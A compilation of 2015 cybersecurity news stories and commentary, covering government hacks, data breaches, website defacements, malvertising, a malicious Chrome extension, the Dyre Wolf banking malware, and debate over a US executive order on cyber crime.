The case came to court after Dallas Buyers Club LLC contacted iiNet and other ISPs, asking them to divulge customer details without a court order. The ISPs refused.

The ISPs have yet to say if they will appeal against the court ruling.

Professor of Law at the University of Technology, Sydney, Michael Fraser said it was an important judgement for ISPs and customers.

"If this [judgement] is upheld then the days of anonymous pirating may be over," Prof Fraser told ABC TV.

Report: U.S. officials say Russians hacked White House computer system

White House officials believe hackers who gained access to their computer network may be the same ones who broke into the State Department’s system, CNN reported.

The White House has been hacked and investigators think they know how, according to unnamed officials in a CNN report.
In November, hackers are said to have breached the U.S. State Department’s unclassified email system. A month later, “suspicious cyber activity” was noticed on a White House computer network, Reuters said. Now it appears as though these same hackers used the State Department cyber intrusion—which has been ongoing despite the department’s best efforts to block and wipe it—as a beachhead to gain entry into the White House’s computer systems.
White House deputy national security advisor—and Fortune 40 under 40 alum—Ben Rhodes told Wolf Blitzer on “The Situation Room” that the White House has separate networks: one classified, one unclassified. Hackers appear only to have breached the unclassified one, CNN reported. As Rhodes told Blitzer:
Well, Wolf, first of all I’m not going to get into details about our cyber security efforts. What I can say though, Wolf, is, as you said, we were public about the fact that we were dealing with cyber intrusions and the State Department was public about that, but the fact of the matter is that we have different systems here at the White House, so we have an unclassified system and then we have a classified system, a top-secret system. That is where the sensitive national security information is—the classified information is—that was a secure system. So we do not believe that our classified systems were compromised.
I will tell you, Wolf, as a general matter we are constantly updating our security precautions on our unclassified systems. But frankly, we’re also told to act as if we need to not put information that is sensitive on that system. So, in other words, if you’re going to do something that’s classified you have to do it on one email system, on one phone system, and frankly you have to act as if information could be compromised if it’s not on the classified system.
According to CNN, unnamed White House officials blamed the White House breach on Russian hackers. “One official says the Russian hackers have ‘owned’ the State Department system for months and it is not clear the hackers have been fully eradicated from the system,” CNN reported. After assessing the malware used by the attackers and their methods, the officials seem to believe that the White House breach is in some way linked to Moscow.
In the fall, U.S. director of national intelligence James Clapper told an audience at the University of Texas in Austin that Russia posed a bigger cyber threat than China.
The intrusion likely resulted, as many cyber breaches do, from an employee clicking on a malicious link or attachment in a so-called phishing email. That’s how investigators believe the hackers accessed the State Department’s systems, according to the Wall Street Journal. It’s also how they believe the hackers infiltrated the White House systems—this time, under the guise of a hijacked State Department email account, CNN said.
Though the White House has downplayed the severity of its breach since the fall, CNN noted that the hackers would have gained access to President Barack Obama’s private itinerary—an undeniably irresistible target for foreign spies.

Data possibly exposed for more than 364K Auburn University students

Auburn University is notifying more than 364,000 current, former and prospective students – as well as applicants who never enrolled in or attended the university – that their personal information was inadvertently accessible via the internet.

How many victims? 364,012.

What type of personal information? The information varied depending on the individual, but included names, addresses, dates of birth, Social Security numbers, email addresses and academic information.

What happened? The personal information of current, former and prospective Auburn University students – as well as applicants who never enrolled in or attended the university – was inadvertently accessible via the internet.

What was the response? Auburn University secured its system and launched an investigation, which is ongoing. The university is conducting a review of its data storage practices and policies. All potentially impacted individuals are being notified, and offered two free years of credit monitoring and identity protection services, as well as lifetime access to fraud resolution services.

Details: Auburn University became aware of the issue on March 2. The information was accessible via the internet between September 2014 and March 2. Auburn University is unaware of any attempted or actual misuse of any personal information as a result of the incident.

Quote: “The exposure resulted from configuration issues with a new device installed to replace a broken server,” according to a notification posted to the Auburn University website.

Source:, “Data Security Incident Information,” April 3, 2015;, “Frequently Asked Questions,” April 3, 2015.

Hackers leak messages between the Kremlin and France’s far-right National Front

Front National (FN) party president Marine Le Pen (L) and member of Parliament Gilbert Collard (R) take part in a Unity rally on January 11, 2015 in Beaucaire (AFP)
French media site Mediapart has reported that hackers have leaked thousands of texts and emails sent between the Kremlin and the French far-right party, the National Front.
According to French newspaper Le Monde, the hackers posted the messages on their website and many of the texts discuss Marine Le Pen, the leader of the National Front, and her support for the annexation of the Crimean peninsula, which occurred in March 2014.
The exchanges are between ‘Timur Prokopenko,’ who the hackers identify as a Kremlin official and Kostya, a man they describe as a “Russian connection” who has access to Le Pen.
The men discuss finding out if Le Pen will back Russia in Crimea by becoming “an observer” of the annexation. According to Le Monde, one message from Prokopenko reads “We really need her, I said to the boss you could arrange this with her”, in reference to Le Pen’s support of the internationally unrecognised referendum held before Russia annexed Crimea. Kostya then gives assurances that the National Front “will officially take a position on the Crimea".
The head of the National Front’s list in Ile-de-France constituency, Aymeric Chauprade, was an observer at the Crimea referendum last March, although the party denied allegations that he had attended as the foreign policy advisor. Speaking of his decision to attend, Chauprade told Russian News Channel RT: “I think the referendum is legitimate. We are talking about long-term history. We are talking about the Russian people, about the territories of the former USSR.”
In February this year, Le Pen gave an interview to the Polish weekly Do Rzeczy in which she said that France should recognise Crimea as part of Russia.
In December she revealed that her party had received a €9m loan from Russian-owned First Czech-Russian Bank, leading to reports that Putin was purposefully bankrolling radical European parties in order to destabilise Europe. However, Le Pen argued that French banks had turned down the National Front for a loan and so they had accepted one from Russia instead.
Le Pen visited Moscow several times last year and met with deputy prime minister Dmitry Rogozin and other Kremlin officials to discuss policy issues

Islamist hackers seize control of Defra's air-quality website

Group calling itself Moroccan Islamic Union-Mail posts picture of Saddam Hussein and criticises Britain for its role in invasion of Iraq
Defra’s hacked air quality website early on Tuesday morning
Defra’s hacked air-quality website early on Tuesday morning. Photograph: Jim McQuaid/Twitter
Islamist hackers seized control of the government’s official air-quality website to post a message criticising Britain for its role in the invasion of Iraq in 2003.
Visitors on Tuesday morning to the UK-Air website, part of the Department for Food, the Environment and Rural Affairs, were greeted with a black background with a a large portrait of the former Iraqi dictator Saddam Hussein.
Beneath it a message in broken English read: “It’s time to remind the British government what you did with Saddam Hussein will not forget. And we are ready to sacrifice with everything, as not to give up Iraq and stay alert for the coming…”
Twitter users noticed the hack, claimed by a group calling itself the Moroccan Islamic Union-Mail, as early as 7am. By 8am the message had been removed and replaced with a holding page. Moroccan Islamic Union-Mail appears to style itself as an Islamist version of the Anonymous hacking group.
A Defra press officer told the Guardian that the department was “aware” of the hack but could provide no further details at that time.
The hacked page included a link to an Arabic-language Facebook page for the Moroccan Islamic Union-Mail. A banner picture on the page showed eight masked men posing in T-shirts bearing the acronym MIUM. A link on the page led to a webpage hosting an Anonymous-style montage video made of news reports on the hackers’ exploits.
On the news feed, the group claimed responsibility for a separate hack of Zambia’s state website, as well as posting anti-Israel messages and comments on Middle East politics.
The Anti-Defamation League, which documents and counters racism, has previously accused MIUM of hacking on behalf of the Islamic State terrorist group. MIUM hackers have targeted Jewish websites in the US during the recent conflict between Israel and Gaza, the ADL said in a blogpost, before turning their attention to US military-linked websites in response to the American-led air campaign against Isis which began in December.
British forces are also involved in the campaign against Isis militants in Iraq. The backbone of the terror group is formed of Sunni Islamists, but elements of Saddam’s Baathist regime – which was backed by Iraq’s Sunni minority – are also said to support the insurgency.
The UK was part of the US-led coalition that invaded Iraq in 2003, toppling Saddam after nearly 24 years in power. The UK’s role in the Iraq war has previously been cited as a justification for terrorist attacks and threats against British nationals.
Mention of the Defra hack was first made on Twitter by Jim McQuaid at 7.05am. The UK-Air home page usually publishes pollution forecasts for the coming days and data on the latest pollution levels. Normal service had been restored to the UK-Air site by 8.24am.

FBI to WordPress users: patch now before ISIL defaces you

The United States Federal Bureau of Investigation (FBI) has issued a warning to WordPress users: hurry up and patch your content management system before web site is defaced by ISIL sympathisers.
The Bureau has issued a notice titled "ISIL defacements exploiting WordPress vulnerabilities" in which it warns that "Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq and al-Shams (ISIS)."
"The defacements have affected Web site operations and the communication platforms of news organizations, commercial entities, religious institutions, federal/state/local governments, foreign governments, and a variety of other domestic and international Web sites," the notice says. "Although the defacements demonstrate low-level hacking sophistication, they are disruptive and often costly in terms of lost business revenue and expenditures on technical services to repair infected computer systems."
The good news is that the Bureau thinks the perps are not ISIL members, but sympathisers. It nonetheless advises WordPress users to get their heads around security and patch plugins ASAP.
It's sound advice: Sucuri researcher Alexandre Montpas is warning of a persistent cross-site scripting vulnerability in the WordPress Super Cache plugin that allows up to a million sites to be hijacked.
Montpas reveals the bug affecting versions below 1.4.3 which have been downloaded more than a million times according to WordPress statistics.
Montpas says attackers could have malcode executed if administrators peered into the plugin's listing page.
"Using this vulnerability, an attacker using a carefully crafted query could insert malicious scripts to the plugin’s cached file listing page," Montpas says.
"As this page requires a valid nonce in order to be displayed, a successful exploitation would require the site’s administrator to have a look at that particular section, manually.
"When executed, the injected scripts could be used to perform a lot of other things like adding a new administrator account to the site, and injecting backdoors by using WordPress theme edition tools"
The since-patched bug resides in the displaying of data within WP-Super-Cache's cache file key that picks the cache file to be loaded.
It is the latest in a laundry list of WordPress plugin vulnerabilities to be disclosed recently.
The problem with un-patched plugins, as distinct from the WordPress platform itself,
WordPress hacking is a favourite pastime of lazy hackers and exploit kit -slingers who seek to achieve maximum carnage for minimum effort.

Google Ads go NUCLEAR, foist exploit kit

Security bod Maarten van Dantzig says a large number of Google ads sold through Bulgarian reseller EngageLab have been pointing users to the dangerous Nuclear exploit kit.
The Fox-IT binary basher found the campaign, which may at the time of writing have been subject to the Choc Factory's boot, could result in a "very large" number of attacks.
Victims could be compromised over Adobe Flash, Java, and Microsoft's lonely orphan Silverlight.
Nuclear exploit kit redirection was first observed overnight targeting Fox-IT customers, van Dantzig says.
"The Fox-IT SOC (security operations centre) has detected a relatively large amount of infections and infection attempts from this exploit kit among our customers [and] we suspect that this malvertising campaign will be of a very large scale," van Dantzig says.
"Though we have not received any official confirmation, we are currently no longer observing malicious redirects from the advertisement reseller."
Van Dantzig reported the command and control server and three others foisting the exploit kit to Google.
He recommends users block access to '', deploy an advertisement blocker and update (or uninstall) Flash, Java, or Silverlight. ®

A MILLION Chrome users' data was sent to ONE dodgy IP address

Image of HAL eye from 2001 movie with Chrome logo in eye
G+A team of security researchers have found malware in a popular Chrome extension which may have sent the browsing data of over 1.2m users to a single IP address.
ScrapeSentry credits its researchers with uncovering "a sinister side-effect to a free app [...] which potentially leaks [users'] personal information back to a single IP address in the USA".
Martin Zetterlund, one of ScrapeSentry's founders, told The Register that the extension's malicious functions would have been difficult to recognise through an automated auditing service because the sneaky developer had ensured this functionality is not downloaded until seven days after being installed..
ScrapeSentry analysed the dodgy Chrome extension last week and submitted its findings to Google.
The offending malware, Webpage Screenshot, was removed from the Chrome Extension web store on Tuesday. The extension apparently allowed users to capture screenshots and save them for later editing.
In a canned statement Zetterlund said: "We recently identified an unusual pattern of traffic to one of our client’s sites which alerted our investigators that something was very wrong."
He added: "Everything downloaded from the internet needs to be treated with suspicion, it's a good idea to look what others have to say about programs and extensions first if you don't have the knowledge to pick them apart yourself."
Cristian Mariolini, the ScrapeSentry analyst who headed up the team that found the rogue extension, noted: “The repercussions of this could be major for the individuals who have downloaded the extension. What happens to the personal data and the motives for wanting it sent it to the US server is anyone’s guess, but ScrapeSentry would take an educated guess it’s not going to be good news."
"And of course, if it’s not stopped, the plug-in may, at any given time, be updated with new malicious functionality as well. We would hope Google will look into this security breach with some urgency," he added.
A spokesman for Webpage Screenshot told the BeeB there was nothing malicious about the data it gathered. Instead, said the company man, it was used to understand who the extension's users were and where they were located to help drive development of the code.
"Users could opt out of sharing data, he said."

Tuesday, 7 April 2015

Huffingtonpost:Don't Be the Weakest Link in Your Company's Cyber Security Plan

The other night, after falling asleep and waking up the next morning, I realized I didn't lock the front door to my home. I have locks on the doors, the windows, an alarm system, hurricane shatterproof windows, and two small dogs with a high-pitch bark that could wake the dead; but all that protection won't do me any good if I forget to lock the front door.

I work for a company that has about 20,000 employees. I own a company that has 18. No matter how big or small your company is we all have something to protect. No matter how many layers of security we have in place, people continue to be the weakest link in their company's Cyber security plan.

Let's go back to the front door analogy for a moment. Even though I have all those layers of security to protect my home, if I don't lock the front door then it's all meaningless and I increase my risk to my family -- what I'm trying to protect. The same holds true for us in business everyday, only the front door isn't always physical it is digital too. Our computers, smartphones and tablets lead directly to our company's front door, providing access to anyone who can get in.

Here's a better way of looking at it.

The company we work for stores our personal information -- social security numbers, first names, last names, phone numbers, and addresses. We should have a strong interest to protect that information because if we don't it could mean the loss or theft of our identities. What about our company's confidential information? We want to protect that too because if we don't, it could mean regulatory compliance fines and reputational damage which could seriously impact our company's bottom line. Some people may lose their jobs if our company can't afford to pay us.

Now, I know what your thinking, "Isn't that why we have a Cyber security team"? Yes, but remember our "front door" analogy? We are at the front door everyday, that digital front door. When we power up our computers in the morning, and open our e-mail, sometimes there's a link or an attachment just waiting to be clicked or open, and that link or attachment, whether we realize it or not, is laden with malicious software (a virus or backdoor) that will leave the front door open to our business. So even though we have a security team in place to protect us, if we click that malicious link or attachment, their hard work and the money they invested to keep the company safe, may not prevent the bad guys from getting in.

So, are you that person? Are you the one who will leave the digital front door to your company unlocked today? Are you the weakest link in your company's cyber security plan? No matter how many firewalls and layers of computer protection your company invests in, if we don't remember to slow down and check the locks on our doors, we could put ourselves and our company at great risk. We all have a role to play to help keep our company's safe.

Be careful what you click. Don't be enticed by tempting messages to watch a funny video or see a nude celebrity. And try to be aware of new social, political, and environmental issues since many hackers use those types of events to entice you into opening that front door. Slow down. Read carefully. Who is the sender? Where you expecting this message or phone call (yes, be on the look out for suspicious phone calls too). If you are unsure then stop what you are doing and ask a security minded professional what they think. If you develop these kinds of behaviors then you won't be the weakest link in your company's cyber security plan. You will have kept the digital front door locked, and your personal and company information safe and secure.

A Herald-State College of Florida public forum on cyber security, identity theft

Last week President Obama put a bright spotlight on devilish issues that jeopardize all Americans: cyber security and identity theft.
Data breaches are all too commonplace today, with personal information and industrial secrets a gold mine for hackers operating for either profit or country.
The global threat is so pervasive and steady, nobody is immune. Last year, FBI Director James Comey told CBS' "60 Minutes" this: "There are two kinds of big companies in the United States. There are those who've been hacked ... and those who don't know they've been hacked ..."
While he was talking specifically about the Chinese, hackers around the world are at work.
Which is why Obama issued an executive order Wednesday empowering the Treasury Department to freeze the financial assets of Internet attackers who threaten our national and economic security.
That includes the theft of trade secrets and personal information, declaring a national emergency on these online threats.
The issue is particularly hot now with income tax season coming to a close, and some filers finding their identities compromised as thieves steal their returns.
To put this into focus, the Herald and State College of Florida Manatee-Sarasota are holding our next Community Conversation on this issue -- on April 29.
This public forum offers you the opportunity to engage experts in information technology and security and learn about Internet vulnerability and risk awareness.
Presented by the Herald and SCF in partnership with Manatee Educational Television, we invite the public to not only attend, but to send us your questions and concerns about this vital issue ahead of the forum. We'll address as many of your questions as possible during the forum.
In order to keep the conversation moving along, there will not be an open mike for public comments and questions during the forum.
Please submit those in advance of the event to or send regular mail to Editorial Page Editor Chris Wille, 1111 Third Ave. W., Bradenton 34205. And please include your name.
The free forum will be held from 6-7:30 p.m. April 29 at SCF's Howard Studio Theater, located on the college's Bradenton campus in Building 11 West, off 60th Avenue West between 26th and 34th streets, accessed from Parking Lot I. Details can be found at
The forum will be broadcast by METV at later dates.
The pervasive and insidious problem of data breaches is best illustrated by these figures:
• 80 million customers of the country's second largest health insurance company, Anthem, had their birthdays, Social Security numbers and employment information taken by cyber attackers, the firm announced in February.
• In December 2013 Target discovered individual contact information on 110 million customer accounts -- credit and debit details -- had been stolen.
• In September 2014, Home Depot reported credit card information of about 56 million shoppers was compromised.
State College of Florida is revamping its associate in science degree in Network Systems Technology this coming fall. That will include a Cybersecurity and Digital Forensics specialization, patterned after the National Security Administration's Center of Academic Excellence guidelines.
As the college notes, demand for cybersecurity professionals has grown 12 times faster than non-IT jobs, and 3.5 times faster than the demand for other IT jobs in recent years.

Read more here:

The Whitehouse’s New Executive Order On Cyber Crime is (Unfortunately) No Joke

On the morning of April 1st, the Whitehouse issued a new executive order (EO) that asserts that malicious “cyber-enabled activities” are a national threat, declares a national emergency, and establishes sanctions and other consequences for individuals and entities. While computer and information security is certainly very important, this EO could dangerously backfire, and chill the very security research that is necessary to protect people from malicious attacks.
We wish we could say it was a very well-orchestrated April Fool’s joke, it appears the Whitehouse was serious. The order is yet another example of bad responses to very real security concerns. It comes at the same time as Congress is considering the White House’s proposal for fundamentally flawed cybersecurity legislation.
That perhaps shouldn’t be surprising, since so far, D.C.’s approach to cybersecurity hasn’t encouraged better security through a better understanding of the threats we face (something security experts internationally have pointed out is necessary). Instead of encouraging critical security research into vulnerabilities, or creating a better way to disclose vulnerabilities, this order could actually discourage that research.
The most pernicious provision, Section 1(ii)(B), allows the Secretary of the Treasury, “in consultation with” the Attorney General and Secretary of State, to make a determination that an person or entity has “materially … provided … technological support for, or goods or services in support of any” of these malicious attacks.
While that may sound good on its face, the fact is that the order is dangerously overbroad. That’s because tools that can be used for malicious attacks are also vital for defense. For example, penetration testing is the process of attempting to gain access to computer systems, without credentials like a username. It’s a vital step in finding system vulnerabilities and fixing them before malicious attackers do. Security researchers often publish tools, and provide support for them, to help with this testing. Could the eo be used to issue sanctions against security researchers who make and distribute these tools? On its face, the answer is…maybe.
To be sure, President Obama has said that “this executive order [does not] target the legitimate cybersecurity research community or professionals who help companies improve their cybersecurity.” But assurances like this are not enough. Essentially, with these words, Obama asks us to trust the Executive, without substantial oversight, to be able to make decisions about the property and rights of people who may not have much recourse once that decision has been made, and who may well not get prior notice before the hammer comes down. Unfortunately, the Department of Justice has used anti-hacking laws far too aggressively to gain that trust.
As several security researchers who spoke up against similarly problematic terms in the Computer Fraud and Abuse Act recently pointed out in an amicus brief:
There are relatively few sources of pressure to fix design defects, whether they be in wiring, websites, or cars. The government is not set up to test every possible product or website for defects before its release, nor should it be; in addition, those defects in electronic systems that might be uncovered by the government (for instance, during an unrelated investigation) are often not released, due to internal policies. Findings by industry groups are often kept quiet, under the assumption that such defects will never come to light—just as in Grimshaw (the Ford Pinto case). The part of society that consistently serves the public interest by finding and publicizing defects that will harm consumers is the external consumer safety research community, whether those defects be in consumer products or consumer websites.
It’s clear that security researchers play an essential function. It was researchers (not the government) who discovered and conscientiously spread the news about Heartbleed, Shellshock, and POODLE, three major vulnerabilities discovered in 2014. Those researchers should not have to question whether or not they will be subject to sanctions.
To make matters worse, while most of the provisions specify that they apply to activity taking place outside of or mostly outside of the US, Section 1(ii)(B) has no such limitation. We have concerns about how the order applies to everyone. But this section also brings up constitutional due process concerns. That is, if it were to apply to people protected by the U.S. Constitution, it could violate the Fifth Amendment right to due process.
As we’ve had to point out repeatedly in the discussions about reforming the Computer Fraud and Abuse Act, unclear laws, prosecutorial (or in this case, Executive Branch) discretion, coupled with draconian penalties are not the answer to computer crime.

Dyre Wolf malware steals more than $1 million, bypasses 2FA protection

Researchers said they've uncovered an active campaign that has already stolen more than $1 million using a combination of malware and social engineering.
The Dyre Wolf campaign, as it has been dubbed by IBM Security researchers, targets businesses that use wire transfers to move large sums of money, even when the transactions are protected with two-factor authentication. The heist starts with mass e-mailings that attempt to trick people into installing Dyre, a strain of malware that came to light last year. The Dyre versions observed by IBM researchers remained undetected by the majority of antivirus products.
Infected machines then send out mass e-mails to other people in the victim's address book. Then the malware lies in wait. A blog post published Thursday by IBM Security Intelligence researchers John Kuhn and Lance Mueller explains the rest:
Once the infected victim tries to log in to one of the hundreds of bank websites for which Dyre is programmed to monitor, a new screen will appear instead of the corporate banking site. The page will explain the site is experiencing issues and that the victim should call the number provided to get help logging in.
One of the many interesting things with this campaign is that the attackers are bold enough to use the same phone number for each website and know when victims will call and which bank to answer as. This all results in successfully duping their victims into providing their organizations’ banking credentials.
As soon as the victim hangs up the phone, the wire transfer is complete. The money starts its journey and bounces from foreign bank to foreign bank to circumvent detection by the bank and law enforcement. One organization targeted with the campaign also experienced a DDoS. IBM assumes this was to distract it from finding the wire transfer until it was too late.
The success of the Dyre Wolf campaign underscores the need for improved training so employees can better spot malicious e-mails and suspicious ruses like the one involving the phone call to the targets' banks.